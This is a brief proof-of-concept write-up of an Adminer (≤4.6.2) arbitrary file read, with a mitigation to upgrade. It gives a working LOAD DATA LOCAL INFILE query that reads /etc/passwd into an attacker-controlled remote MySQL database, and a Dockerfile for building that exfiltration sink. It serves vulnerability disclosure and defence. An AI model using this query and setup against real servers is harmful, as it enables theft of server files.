Exploiting Adminer's file read vulnerability with LOCAL DATA

2-minute read
exploit poc
Table of contents :

Introduction

Improper Access Control in Adminer versions <= 4.6.2 (fixed in version 4.6.3) allows an attacker to achieve Arbitrary File Read on the server by connecting a remote MySQL database to the Adminer.

Affected products and versions

To exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls. Then he can read and exfiltrate local files on the Adminer using the SQL query LOAD DATA LOCAL INFILE

Exploitation

In order to exploit this vulnerability, an attacker needs to access the login page of Adminer and connect back to a remote MySQL database he controls:

After this, the attacker goes to the “SQL Command” page on the Adminer:

With the following SQL command, the attacker can read a local file on the Adminer server line and load it into his remote database:

LOAD DATA local INFILE '/etc/passwd' INTO TABLE lfr_sink_table fields TERMINATED BY "\n";

Once this is done, the attacker can view the contents of the read file with SELECT * FROM lfr_sink_table;:

All Adminer versions between 1.12.0 and 4.6.2 (included) are vulnerable:

Adminer vulnerable versions

Preparing a container for MySQL

FROM debian:latest

ENV SINKUSER="lfr_sink_user"
ENV SINKPASS="lfr_sink_password"

ENV DEBIAN_FRONTEND=noninteractive
RUN apt -y update; apt -y install default-mysql-server default-mysql-client

RUN sed -i 's/^.*bind-address.*=.*$/bind-address = 0.0.0.0/g' /etc/mysql/mariadb.conf.d/50-server.cnf

RUN service mysql start;\
    mysql -u root -e "CREATE USER '${SINKUSER}'@'%' IDENTIFIED BY '${SINKPASS}'; UPDATE mysql.user set plugin = 'mysql_native_password' WHERE User = '${SINKUSER}'; GRANT ALL PRIVILEGES ON *.* TO '${SINKUSER}'@'%' WITH GRANT OPTION; FLUSH PRIVILEGES;" ;\
    mysql -u root -e "CREATE DATABASE IF NOT EXISTS lfr_sink_db; SET GLOBAL local_infile = true;" ;\
    mysql -u root -e "USE lfr_sink_db; CREATE TABLE IF NOT EXISTS lfr_sink_table (a varchar(255));"

EXPOSE 3306

CMD ["mysqld"]

Mitigations

In order to fix this vulnerability you need to update your Adminer to the latest version or a version >= 4.6.3. This vulnerability was fixed by the editor in version 4.6.3.

References